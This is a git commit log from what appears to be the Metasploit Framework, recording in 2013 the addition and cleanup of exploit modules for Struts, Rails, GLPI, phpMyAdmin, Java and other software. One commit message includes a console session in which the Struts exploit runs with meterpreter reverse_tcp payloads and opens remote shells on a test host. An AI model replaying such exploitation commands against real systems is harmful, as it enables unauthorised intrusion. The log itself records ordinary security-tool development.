joev
99e46d2cdb
Merge branch 'master' into cve-2013-4660_js_yaml_code_exec
...
Conflicts:
modules/exploits/multi/handler.rb
2013-09-25 00:32:56 -05:00
Tod Beardsley
93486a627d
Whoops on trailing commas
2013-09-24 15:14:11 -05:00
Tod Beardsley
3906d4a2ca
Fix caps that throw msftidy warnings
2013-09-24 13:03:16 -05:00
Tod Beardsley
c547e84fa7
Prefer Ruby style for single word collections
...
According to the Ruby style guide, %w{} collections for arrays of single
words are preferred. They're easier to type, and if you want a quick
grep, they're easier to search.
This change converts all Payloads to this format if there is more than
one payload to choose from.
It also alphabetizes the payloads, so the order can be more predictable,
and for long sets, easier to scan with eyeballs.
See:
https://github.com/bbatsov/ruby-style-guide#collections
2013-09-24 12:33:31 -05:00
Tod Beardsley
4bff8f2cdc
Update descriptions for clarity.
2013-09-23 13:48:23 -05:00
Joe Vennix
a08d195308
Add Node.js as a platform.
...
* Fix some whitespace issues in platform.rb
2013-09-20 18:14:01 -05:00
Joe Vennix
49f15fbea4
Removes PayloadType from exploit module.
2013-09-20 18:01:55 -05:00
jvazquez-r7
29649b9a04
Land #2388 , @dummys's exploit for CVE-2013-5696
2013-09-20 13:03:01 -05:00
jvazquez-r7
8922d0fc7f
Fix small bugs on glpi_install_rce
2013-09-20 13:01:41 -05:00
jvazquez-r7
b24ae6e80c
Clean glpi_install_rce
2013-09-20 12:58:23 -05:00
dummys
032b9115a0
removed the old exploit
2013-09-20 10:53:52 +02:00
dummys
187ab16467
many change in the code and replace at the correct place the module
2013-09-20 10:45:10 +02:00
sinn3r
8d70a9d893
Add more refs
2013-09-19 22:05:23 -05:00
Joe Vennix
137b3bc6ea
Fix whitespace issues.
2013-09-19 17:29:11 -05:00
Joe Vennix
bd96c6c093
Adds module for CVE-2013-3568.
2013-09-19 17:26:30 -05:00
dummys
08c7b49be0
corrected too much if
2013-09-19 21:47:01 +02:00
dummys
862a8fb8aa
corrected indentation bug again
2013-09-19 20:27:23 +02:00
dummys
ce8e94b5fe
corrected indentation bug
2013-09-19 20:14:07 +02:00
dummys
f9617e351d
corrected Integer()
2013-09-19 16:04:20 +02:00
dummys
bc57c9c6ec
corrected some codes requested by Meatballs
2013-09-18 17:55:36 +02:00
dummys
3366c3aa77
CVE-2013-5696 RCE for GLPI
2013-09-18 16:11:32 +02:00
Joe Vennix
5fc724bced
Kill explanatory comment.
2013-09-16 21:34:38 -05:00
Joe Vennix
2c47e56d90
Adds module for yaml code exec.
2013-09-16 21:33:57 -05:00
Joe Vennix
e1e1cab797
Module gets me a shell, yay
2013-09-16 13:37:16 -05:00
Tab Assassin
41e4375e43
Retab modules
2013-08-30 16:28:54 -05:00
Vlatko Kosturjak
b702a0d353
Fix "A payload has not been selected."
...
Since platform definition is missing, exploitation fails.
2013-08-28 12:53:08 +02:00
Tod Beardsley
ca313806ae
Trivial grammar and word choice fixes for modules
2013-08-19 13:24:42 -05:00
Steve Tornio
0037ccceed
add osvdb ref for openx backdoor
2013-08-18 06:34:50 -05:00
jvazquez-r7
1a3b4eebdb
Fix directory name on ruby
2013-08-15 22:54:31 -05:00
jvazquez-r7
795ad70eab
Change directory names
2013-08-15 22:52:42 -05:00
jvazquez-r7
c5c2aebf15
Update references
2013-08-15 22:04:15 -05:00
jvazquez-r7
cc5804f5f3
Add Port for OSVDB 96277
2013-08-15 18:34:51 -05:00
sinn3r
462ccc3d36
Missed these little devils
2013-08-15 16:50:13 -05:00
HD Moore
6c1ba9c9c9
Switch to Failure vs Exploit::Failure
2013-08-15 14:14:46 -05:00
Tod Beardsley
6c0b067d7c
Land #2163 , known secret session cookie for RoR
...
From @joernchen, leverages an infoleak to gain a shell on rails
applications. There is no patch, since you are expected to keep your
secrets, well, secret.
2013-08-09 12:30:37 -05:00
Tod Beardsley
969b380d71
More explicit title, grammar check on description
2013-08-09 12:27:45 -05:00
Tod Beardsley
13ea8aaaad
VALIDATE_COOKIE better grammar on fail message
2013-08-09 12:26:12 -05:00
Tod Beardsley
94e7164b01
Allow user to choose to validate the cookie or not
2013-08-09 12:22:28 -05:00
joernchen of Phenoelit
376c37d4cc
Two more fixes, Arch and unneeded include.
2013-08-09 09:23:50 +02:00
Tod Beardsley
155c121cbb
More spacing between ends
2013-08-08 16:35:38 -05:00
Tod Beardsley
f4fc0ef3fb
Moved classes into the Metasploit3 space
...
I'm just worried about all those naked classes just hanging around in
the top namespace. This shouldn't impact functionality at all.
While most modules don't define their own classes (this is usually the
job of Msf::Exploit and Rex), I can't think of a reason why you
shouldn't (well, aside from reusability). And yet, very rarely do
modules do it. It's not unknown, though -- the drda.rb capture module
defines a bunch of Constants, and the
post/windows/gather/credentials/bulletproof_ftp.rb module defines some
more interesting things.
So, this should be okay, as long as things are defined in the context of
the Metasploit module proper.
2013-08-08 16:22:34 -05:00
Tod Beardsley
4e166f3da4
Adding more blank lines between methods
...
For readability
2013-08-08 16:20:38 -05:00
jvazquez-r7
4a609504e3
Land #2199 , @jlee-r7's exploit for CVE-2013-4211
2013-08-08 14:57:28 -05:00
sinn3r
a03d71d60e
Land #2181 - More targets for hp_sys_mgmt_exec
...
Thanks mwulftange!
2013-08-08 13:35:33 -05:00
sinn3r
a73f87eaa5
No autodetect. Allow the user to manually select.
2013-08-08 13:34:25 -05:00
James Lee
080ca0b1b1
Use fail_with when failing instead of print_error
2013-08-08 13:12:39 -05:00
James Lee
ca7c0defe1
No need to rescue if we're just re-raising
2013-08-07 17:36:07 -05:00
James Lee
c808930f15
Add module for CVE-2013-4211, openx backdoor
2013-08-07 17:24:47 -05:00
HD Moore
c73e417531
Merge pull request #2171 from frederic/master
...
add new target in libupnp_ssdp_overflow exploit : Axis Camera M1011
2013-08-05 18:31:41 -07:00
Tod Beardsley
e7206af5b5
OSVDB and comment doc fixes
2013-08-05 09:08:17 -05:00
Markus Wulftange
9955899d9a
Minor formal fixes
2013-08-04 08:03:02 +02:00
Markus Wulftange
8cc07cc571
Merge Linux and Windows exploit in multi platform exploit
2013-08-02 18:49:03 +02:00
Frederic Basse
5e1def26aa
remove Axis M1011 fingerprint, may not be specific enough to be used automatically.
2013-07-30 09:54:33 +02:00
Tod Beardsley
7e539332db
Reverting disaster merge to 593363c5f
with diff
...
There was a disaster of a merge at 6f37cf22eb
that is particularly
difficult to untangle (it was a bad merge from a long-running local
branch).
What this commit does is simulate a hard reset, by doing thing:
git checkout -b reset-hard-ohmu
git reset --hard 593363c5f9
git checkout upstream-master
git checkout -b revert-via-diff
git diff --no-prefix upstream-master..reset-hard-ohmy > patch
patch -p0 < patch
Since there was one binary change, also did this:
git checkout upstream-master data/exploits/CVE-2012-1535/Main.swf
Now we have one commit that puts everything back. It screws up
file-level history a little, but it's at least at a point where we can
move on with our lives. Sorry.
2013-07-29 21:47:52 -05:00
Frederic Basse
63940d438e
add new target in libupnp_ssdp_overflow exploit : Axis Camera M1011
2013-07-30 01:56:10 +02:00
joernchen of Phenoelit
ac28dbe734
Minor typo fix
2013-07-28 19:44:44 +02:00
joernchen of Phenoelit
8cdd163150
Module polishing, thanks @todb-r7.
...
Two test-apps (Rails 3/4) are available for this module. Ping me if you want to use them.
2013-07-28 13:52:27 +02:00
joernchen of Phenoelit
7f3eccd644
Rails 3/4 RCE w/ token
2013-07-26 20:23:18 +02:00
jvazquez-r7
5014919198
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-25 09:02:20 -05:00
jvazquez-r7
7641aa3e63
Delete stop_service calls
2013-07-24 16:35:15 -05:00
jvazquez-r7
8dd7a664b4
Give a chance to FileDropper too
2013-07-24 08:57:43 -05:00
jvazquez-r7
04b9e3a3e6
Add module for CVE-2013-2251
2013-07-24 08:52:02 -05:00
jvazquez-r7
458ac5f289
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-17 15:02:33 -05:00
jvazquez-r7
73fd14a500
Fix [SeeRM #8239 ] NoMethodError undefined method
2013-07-16 15:59:52 -05:00
jvazquez-r7
c4485b127c
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-04 19:43:38 -05:00
jvazquez-r7
8772cfa998
Add support for PLESK on php_cgi_arg_injection
2013-07-04 08:24:25 -05:00
jvazquez-r7
db00599d44
Move carberp_backdoor_exec to unix webapp exploits foler
2013-06-30 10:00:14 -05:00
Brian Wallace
d990c7f21f
Dat line
2013-06-29 09:46:36 -07:00
Brian Wallace
ec7c9b039a
Further refactoring requested
2013-06-29 09:45:22 -07:00
Brian Wallace
8542342ff6
Merge branch 'carberp_backdoor_exec' of git@github.com:bwall/metasploit-framework.git into carberp_backdoor_exec
2013-06-28 22:45:03 -07:00
Brian Wallace
b8cada9ab0
Applied some refactoring to decrease line count
2013-06-28 22:44:23 -07:00
(B)rian (Wall)ace
9486364cc4
Added Steven K's email
2013-06-28 15:31:17 -07:00
Brian Wallace
fe0e16183c
Carberp backdoor eval PoC
2013-06-28 14:47:13 -07:00
jvazquez-r7
3c1af8217b
Land #2011 , @matthiaskaiser's exploit for cve-2013-2460
2013-06-26 14:35:22 -05:00
jvazquez-r7
81a2d9d1d5
Merge branch 'module_java_jre17_provider_skeleton' of https://github.com/matthiaskaiser/metasploit-framework
2013-06-26 14:32:59 -05:00
jvazquez-r7
4fa789791d
Explain Ranking
2013-06-25 13:10:15 -05:00
jvazquez-r7
127300c62d
Fix also ruby module
2013-06-25 12:59:42 -05:00
jvazquez-r7
0c306260be
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-25 09:13:01 -05:00
sinn3r
4df943d1a2
CVE and OSVDB update
2013-06-25 02:06:20 -05:00
jvazquez-r7
e9fccb8dbd
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-24 22:07:48 -05:00
HD Moore
24b7d19ecc
Fix target regex and wfsdelay
2013-06-24 14:56:43 -05:00
jvazquez-r7
98fddb6ce1
up to date
2013-06-24 11:57:11 -05:00
jvazquez-r7
f7650a4b18
Fix wrong local variable
2013-06-24 11:35:26 -05:00
Matthias Kaiser
8a96b7f9f2
added Java7u21 RCE module
...
Click2Play bypass doesn't seem to work anymore.
2013-06-24 02:04:38 -04:00
jvazquez-r7
785639148c
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-20 17:18:42 -05:00
William Vu
4cc1f2440d
Land #1996 , references for several modules
2013-06-20 11:32:55 -05:00
Steve Tornio
322ba27f0f
re-order refs
2013-06-20 11:17:23 -05:00
William Vu
22026352e6
Land #1995 , OSVDB reference for Gitorious
2013-06-20 10:51:51 -05:00
Steve Tornio
66f4424202
fix formatting
2013-06-20 10:41:14 -05:00
Steve Tornio
a3a5dec369
add osvdb ref 94441
2013-06-20 08:03:34 -05:00
Steve Tornio
a824a0583e
add osvdb ref 89059
2013-06-20 07:34:15 -05:00
Steve Tornio
89f649ab99
add osvdb ref 89026
2013-06-20 07:28:29 -05:00
Steve Tornio
2b55e0e0a6
add osvdb ref 64171
2013-06-20 07:17:22 -05:00
Steve Tornio
d19bd7a905
add osvdb 85739, cve 2012-5159, edb 21834
2013-06-20 07:01:59 -05:00
Steve Tornio
6cc7d9ccae
add osvdb ref 85446 and edb ref 20500
2013-06-20 06:54:06 -05:00
Steve Tornio
ee21120c04
add osvdb ref 85509
2013-06-20 06:47:10 -05:00
Steve Tornio
ade970afb8
add osvdb ref 89322
2013-06-20 06:44:22 -05:00
Steve Tornio
42690a5c48
add osvdb ref 77492
2013-06-20 06:38:47 -05:00
Steve Tornio
0dca5ede7e
add osvdb ref 78480
2013-06-20 06:07:08 -05:00
Steve Tornio
29bc169507
add osvdb ref 64171
2013-06-20 06:00:05 -05:00
jvazquez-r7
869438cb73
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-19 19:57:40 -05:00
James Lee
81b4efcdb8
Fix requires for PhpEXE
...
And incidentally fix some msftidy complaints
2013-06-19 16:27:59 -05:00
jvazquez-r7
fd397db6e0
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-18 14:09:33 -05:00
sinn3r
b514124997
Land #1979 - OSVDB update
2013-06-18 10:42:09 -05:00
sinn3r
fbd16a2f3e
Land #1978 - OSVDB update
2013-06-18 10:41:33 -05:00
sinn3r
1e46f7df48
Land #1977 - OSVDB update
2013-06-18 10:40:55 -05:00
Steve Tornio
e278ac5061
add osvdb ref 91841
2013-06-18 06:41:30 -05:00
Steve Tornio
404a9f0669
add osvdb ref 89594
2013-06-18 06:25:57 -05:00
Steve Tornio
27158d89c7
add osvdb ref 89105
2013-06-18 06:15:29 -05:00
Steve Tornio
2afc90a8de
fix typos
2013-06-18 06:05:45 -05:00
Steve Tornio
2c3181b56b
add osvdb ref 90627
2013-06-18 05:59:39 -05:00
jvazquez-r7
de1561363e
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-17 16:43:33 -05:00
William Vu
b51349ed77
Land #1968 , OSVDB reference for ManageEngine
2013-06-17 10:30:05 -05:00
jvazquez-r7
8fac0aaf6b
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-17 08:24:39 -05:00
Steve Tornio
e37a0b871f
add osvdb ref 86562
2013-06-17 06:04:54 -05:00
Steve Tornio
6e57ecab59
add osvdb ref 79246 and edb ref 18492
2013-06-17 05:58:00 -05:00
Steve Tornio
e17ccdda3a
add osvdb ref 68662
2013-06-16 18:11:13 -05:00
jvazquez-r7
11bf17b0d6
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-15 11:55:22 -05:00
William Vu
0cf2751ec1
Land #1965 , OSVDB reference for pBot
2013-06-15 07:39:25 -05:00
Steve Tornio
d35dd73328
add osvdb ref 84913
2013-06-15 07:30:23 -05:00
William Vu
638175a6be
Land #1964 , OSVDB reference for StorageWorks
2013-06-15 07:27:43 -05:00
Steve Tornio
0c6157694f
add osvdb ref 82087
2013-06-15 07:22:32 -05:00
Steve Tornio
6e8b844954
add osvdb ref 89611
2013-06-15 07:12:44 -05:00
Steve Tornio
63483a979d
add osvdb ref 89611
2013-06-15 07:09:26 -05:00
jvazquez-r7
0b9cf213df
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-12 12:03:10 -05:00
Joe Vennix
45da645717
Update ff svg exploit description to be more accurate.
2013-06-11 12:12:18 -05:00
jvazquez-r7
b20a38add4
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-10 12:22:52 -05:00
Tod Beardsley
f58e279066
Cleanup on module names, descriptions.
2013-06-10 10:52:22 -05:00
jvazquez-r7
9d0047ff74
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-07 16:44:52 -05:00
jvazquez-r7
79bfdf3ca6
Add comment to explain the applet delivery methods
2013-06-07 14:20:21 -05:00
jvazquez-r7
641fd3c6ce
Add also the msf module
2013-06-07 13:39:19 -05:00
jvazquez-r7
6497e5c7a1
Move exploit under the linux tree
2013-06-04 08:53:18 -05:00
jvazquez-r7
0bf2f51622
Land #1843 , @viris exploit for CVE-2013-0230
2013-06-04 08:52:09 -05:00
jvazquez-r7
86c768ad02
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-04 08:15:28 -05:00
Dejan Lukan
8ced3483de
Deleted some undeeded comments and used the text_rand function rather than static values.
2013-06-04 08:44:47 +02:00
sinn3r
ad87065b9a
Land #1904 - Undefined variable 'path' in tomcat_deploy_mgr.rb
2013-06-04 01:35:13 -05:00
Ruslaideemin
71bc06d576
Fix undefined variable in tomcat_mgr_deploy.rb
...
Exploit failed (multi/http/tomcat_mgr_deploy): NameError undefined
local variable or method `path' for #<Msf...>
[06/04/2013 10:14:03] [d(3)] core: Call stack:
modules/exploits/multi/http/tomcat_mgr_deploy.rb:253:in `exploit'
lib/msf/core/exploit_driver.rb:205:in `job_run_proc'
lib/msf/core/exploit_driver.rb:166:in `run'
lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
lib/msf/ui/console/command_dispatcher/exploit.rb:111:in `cmd_exploit'
lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'
lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'
lib/rex/ui/text/dispatcher_shell.rb:383:in `each'
lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'
lib/rex/ui/text/shell.rb:200:in `run'
lib/msf/ui/web/console.rb:71:in `block in initialize'
lib/msf/core/thread_manager.rb💯 in `call'
lib/msf/core/thread_manager.rb💯 in `block in spawn'
Uses path instead of path_tmp in error messages.
2013-06-04 11:19:28 +10:00
jvazquez-r7
4079484968
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-03 15:27:36 -05:00
Tod Beardsley
4cf682691c
New module title and description fixes
2013-06-03 14:40:38 -05:00
Dejan Lukan
df20e79375
Deleted the handle because it's not required and check() function.
2013-06-03 10:18:43 +02:00
Dejan Lukan
36f275d71a
Changed the send_request_raw into send_request_cgi function.
2013-06-03 10:06:24 +02:00
Dejan Lukan
675fbb3045
Deleted the DoS UPnP modules, because they are not relevant to the current branch.
2013-06-03 09:45:29 +02:00
Dejan Lukan
1ceed1e44a
Added corrected MiniUPnP module.
2013-06-03 09:37:04 +02:00
Dejan Lukan
d656360c24
Added CVE-2013-0230 for MiniUPnPd 1.0 stack overflow vulnerability
2013-06-03 09:37:03 +02:00
Dejan Lukan
39e4573d86
Added CVE-2013-0229 for MiniUPnPd < 1.4
2013-06-03 09:37:03 +02:00
jvazquez-r7
f68d35f251
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-01 17:09:23 -05:00
Steve Tornio
80f1e98952
added osvdb refs
2013-06-01 07:04:43 -05:00
jvazquez-r7
48b14c09e3
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-31 01:12:46 -05:00
jvazquez-r7
146a30ec4d
Do minor cleanup for struts_include_params
2013-05-31 01:01:15 -05:00
jvazquez-r7
a7a754ae1f
Land #1870 , @Console exploit for Struts includeParams injection
2013-05-31 00:59:33 -05:00
Console
eb4162d41b
boolean issue fix
2013-05-30 18:15:33 +01:00
Console
5fa8ecd334
removed magic number 109
...
now calculated from the actual length of all static URL elements
2013-05-30 17:40:43 +01:00
Console
47524a0570
converted request params to hash merge operation
2013-05-30 15:36:01 +01:00
Console
51879ab9c7
removed unnecessary lines
2013-05-30 15:15:10 +01:00
Console
abb0ab12f6
Fix msftidy compliance
2013-05-30 13:10:24 +01:00
Console
5233ac4cbd
Progress bar instead of message spam.
2013-05-30 13:08:43 +01:00
Console
fb388c6463
Chunk length is now "huge" for POST method
...
minor changes to option text and changed HTTPMETHOD to an enum.
2013-05-30 11:30:24 +01:00
Console
ab6a2a049b
Fix issue with JAVA meterpreter failing to work.
...
Was down to the chunk length not being set correctly.
Still need to test against windows.
```
msf exploit(struts_include_params) > show targets
Exploit targets:
Id Name
-- ----
0 Windows Universal
1 Linux Universal
2 Java Universal
msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.0.1 - Meterpreter session 5 closed. Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
2013-05-30 10:35:29 +01:00
Console
d70526f4cc
Renamed as per suggestion
2013-05-30 09:29:26 +01:00
Console
7c38324b76
Considered using the bourne stager.
...
Decided against it as current implementation of JAVA base64
encode/decode appears to be more OS agnostic and robust.
Tidied up a few lines of code and added some more output.
2013-05-29 14:21:23 +01:00
Console
ec315ad50d
Modified URI handling to make use of target_uri and vars_get/post.
...
Added support for both GET and POST methods as both are vulnerable to
this exploit.
2013-05-29 12:56:34 +01:00
Console
b39531cea6
Added references
2013-05-28 23:15:10 +01:00
jvazquez-r7
66ea59b03f
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-28 15:22:46 -05:00
Console
7b43117d87
Added RCE for Struts versions earlier than 2.3.14.2
...
Heavily based upon my previous module for parameters
interceptor based RCE.
Tested against the POC given at the reference website successfully.
2013-05-28 18:26:57 +01:00
James Lee
9843dc4cb4
Land #1708 , android meterpreter
...
Conflicts:
data/meterpreter/ext_server_stdapi.jar
2013-05-28 12:19:45 -05:00
Tod Beardsley
75d6c8079a
Spelling, whitespace
...
Please be sure to run msftidy.rb on new modules. Thanks!
2013-05-28 10:03:37 -05:00
jvazquez-r7
d5cf6c1fbc
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-23 12:37:54 -05:00
sinn3r
81ad280107
Landing #1856 - CVE-2013-0758 Firefox <= 17.0.1 + Flash RCE
...
Chained exploit using CVE-2013-0758 and CVE-2013-0757
2013-05-23 12:21:10 -05:00
sinn3r
67861794f6
Fix automatic payload selection
2013-05-22 22:37:18 -05:00
sinn3r
23fe3146dc
Extra print_status I don't want
2013-05-22 14:38:30 -05:00
sinn3r
0e6576747a
Fix target selection probs, and swf path
2013-05-22 14:34:00 -05:00
jvazquez-r7
0dee5ae94d
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-22 12:54:44 -05:00
Joe Vennix
aae4768563
Fix whitespace issues from msftidy.
2013-05-21 14:31:36 -05:00
Joe Vennix
eaeb10742a
Add some comments and clean some things up.
2013-05-21 14:01:14 -05:00
Joe Vennix
978aafcb16
Add DEBUG option, pass args to .encoded_exe().
2013-05-21 14:01:14 -05:00
Joe Vennix
ee8a97419c
Add some debug print calls to investigate Auto platform selection.
2013-05-21 14:01:13 -05:00
Joe Vennix
60fdf48535
Use renegerate_payload(cli, ...).
2013-05-21 14:01:13 -05:00
James Lee
f4498c3916
Remove $Id tags
...
Also adds binary coding magic comment to a few files
2013-05-20 16:21:03 -05:00
jvazquez-r7
0f3b13e21d
up to date
2013-05-16 15:02:41 -05:00
James Lee
3009bdb57e
Add a few more references for those without
2013-05-16 14:32:02 -05:00
h0ng10
378f0fff5b
added missing comma
2013-05-16 18:59:46 +02:00
Joe Vennix
1a5c747bb9
Update description.
2013-05-15 23:52:51 -05:00
Joe Vennix
178a43a772
Whitespace tweaks and minor bug fix. Wrong payloads still run.
2013-05-15 23:47:04 -05:00
Joe Vennix
f4b6db8c49
Tweak whitespace.
2013-05-15 23:35:59 -05:00
Joe Vennix
a7d79e2a51
Oops, don't cache payload_filename.
2013-05-15 23:34:14 -05:00
Joe Vennix
4d5c4f68cb
Initial commit, works on three OSes, but automatic mode fails.
2013-05-15 23:32:02 -05:00
jvazquez-r7
cb24d3ddae
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-15 11:13:29 -05:00
James Lee
61afe1449e
Landing #1275 , bash cmdstager
...
Conflicts:
lib/rex/exploitation/cmdstager.rb
Conflict was just the $Id$ tag, which is no longer used anyway.
2013-05-15 10:44:05 -05:00
jvazquez-r7
352a7afcd6
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-14 22:29:24 -05:00
sinn3r
41e9f35f3f
Landing #1819 - Convert sap_mgmt_con_osexec_payload to multi platform
2013-05-14 14:48:16 -05:00
jvazquez-r7
b9caa23b30
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-14 12:26:23 -05:00
Tod Beardsley
e3384439ed
64-bit, not '64 bits'
2013-05-13 15:40:17 -05:00
jvazquez-r7
495f1e5013
Add multi platform module for SAP MC exec exploit
2013-05-12 08:46:00 -05:00
jvazquez-r7
891e36c947
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-09 17:47:35 -05:00
jvazquez-r7
4147a27216
Land #1667 , @nmonkee's sap_soap_rfc_sxpg_command_exec exploit
2013-05-09 17:00:11 -05:00
jvazquez-r7
6842432abb
Land #1678 , @nmonkee's sap_soap_rfc_sxpg_call_system_exec exploit
2013-05-09 16:52:01 -05:00
jvazquez-r7
e939de583c
Clean up and multi platform support for sap_soap_rfc_sxpg_command_exec
2013-05-07 22:46:39 -05:00
jvazquez-r7
5f59d9f723
Move sap_soap_rfc_sxpg_command_exec to multi dir
2013-05-07 22:46:04 -05:00
jvazquez-r7
ab60e0bfb7
Fix print message
2013-05-07 22:41:15 -05:00
jvazquez-r7
24bad9c15c
Clean up sap_soap_rfc_sxpg_call_system_exec and make it multi platform
2013-05-07 17:03:10 -05:00
jvazquez-r7
76f6d9f130
Move module to multi-platform location
2013-05-07 17:01:56 -05:00
jvazquez-r7
a4632b773a
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-28 12:59:16 -05:00
sinn3r
1d9a695d2b
Landing #1772 - Adds phpMyadmin Preg_Replace module (CVE-2013-3238)
...
[Closes #1772 ]
2013-04-28 12:17:16 -05:00
Meatballs
ccb630eca2
Whitespace and change default user
2013-04-27 10:39:27 +01:00
Meatballs
209188bc22
Add refs and use targeturi
2013-04-27 10:35:49 +01:00
Meatballs
3ac041386b
Add php version to check
2013-04-26 23:59:49 +01:00
Meatballs
e25fdebd8d
Add php version to check
2013-04-26 23:58:08 +01:00
Meatballs
cd842df3e2
Correct phpMyAdmin
2013-04-26 23:38:27 +01:00
Meatballs
6bb2af7cee
Add pma url
2013-04-26 23:37:26 +01:00
James Lee
a0c1b6d1ce
Clear out PMA's error handler
...
* Add an error_handler function that just returns true. This prevents eventual
ENOMEM errors and segfaults like these:
[Fri Apr 26 15:01:00 2013] [error] [client 127.0.0.1] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 44659282 bytes) in /home/egypt/repo/phpmyadmin/libraries/Error.class.php on line 156
[Fri Apr 26 15:01:16 2013] [notice] child pid 7347 exit signal Segmentation fault (11)
* clean up some whitespace
2013-04-26 15:25:09 -05:00
Meatballs
1f2cab7aef
Tidyup and getcookies
2013-04-26 20:26:04 +01:00
Meatballs
0901d00da5
Remove redundant pay opts
2013-04-26 19:26:29 +01:00
Meatballs
a17d61897d
Change to send_rq_cgi
2013-04-26 19:19:11 +01:00
Meatballs
54233e9fba
Better entropy
2013-04-26 17:46:43 +01:00
Meatballs
c8da13cfa0
Add some entropy in request
2013-04-26 17:34:17 +01:00
Meatballs
a043d3b456
Fix auth check and cookie handling
2013-04-26 17:10:24 +01:00
Meatballs
025315e4e4
Move to http
2013-04-26 15:42:26 +01:00
Meatballs
9ad19ed2bf
Final tidyup
2013-04-26 15:41:28 +01:00
Meatballs
c7ac647e4e
Initial attempt lfi
2013-04-26 14:32:18 +01:00
jvazquez-r7
2a41422276
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-25 20:24:17 -05:00
jvazquez-r7
bf0375f0e9
Fix @jlee-r7's feedback
2013-04-25 18:43:21 -05:00
jvazquez-r7
8eea476cb8
Build the jnlp uri when resource is available
2013-04-25 18:43:21 -05:00
jvazquez-r7
cc961977a2
Add bypass for click2play
2013-04-25 18:43:21 -05:00
jvazquez-r7
1761b1ad7b
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-23 17:35:35 -05:00
jvazquez-r7
ece36c0610
Update references for the las Java exploit
2013-04-22 21:55:04 -05:00
jvazquez-r7
b6365db0b5
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-22 09:38:32 -05:00
jvazquez-r7
1365dfe68c
Add Oracle url
2013-04-20 01:43:14 -05:00
jvazquez-r7
b99fc06b6f
description updated
2013-04-20 01:43:14 -05:00
jvazquez-r7
19f2e72dbb
Added module for Java 7u17 sandboxy bypass
2013-04-20 01:43:13 -05:00
jvazquez-r7
bbf7cc4394
up to date
2013-04-17 11:54:12 -05:00
jvazquez-r7
48def7dbdb
up to date
2013-04-17 06:36:44 -05:00
Jon Hart
83ec9757ec
Addressed feedback from PR#1717
2013-04-16 19:00:26 -07:00
jvazquez-r7
cc35591723
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-15 17:43:15 -05:00
Tod Beardsley
873bdbab57
Removing APSB13-03, not ready.
...
This was landed by @todb-r7 on #1709 but that was premature. #1717 was
a proposed set of fixes, but it didn't go far enough.
@jhart-r7 and @jvazquez-r7 should revisit this module for sure, there's
some good stuff in there, but it's not ready for a real release quite
yet. Take a look at the issues discussed in those PRs and open a new PR
with a new module?
Sorry for the switcheroo, not trying to be a jerk.
[Closes #1717 ]
2013-04-15 13:36:47 -05:00
timwr
32bd812bdb
android meterpreter
2013-04-12 18:57:04 +01:00
jvazquez-r7
2ab7552a85
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-10 09:11:41 +02:00
